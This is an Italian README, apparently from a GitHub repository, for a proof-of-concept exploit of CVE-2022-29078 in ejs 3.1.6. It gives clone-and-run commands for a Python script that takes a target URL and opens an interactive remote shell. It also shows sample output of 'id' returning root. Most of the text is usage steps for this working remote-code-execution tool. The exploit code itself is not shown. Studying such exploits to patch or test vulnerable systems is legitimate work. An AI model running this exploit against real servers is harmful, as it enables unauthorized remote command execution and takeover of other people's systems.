
Exploit proof-of-concept per CVE-2022-29078 (ejs 3.1.6) che consente esecuzione remota di comandi tramite script Python. Accetta un URL target e fornisce una shell interattiva.
PoC semplice per CVE-2022-29078 (ejs vulnerabile 3.1.6)
git clone https://github.com/chuckdu21/CVE-2022-29078.git
cd CVE-2022-29078
python3 CVE-2022-29078.py <URL>
Verrà visualizzato un prompt per eseguire comandi
$ id
uid=0(root) gid=0(root) groupes=0(root)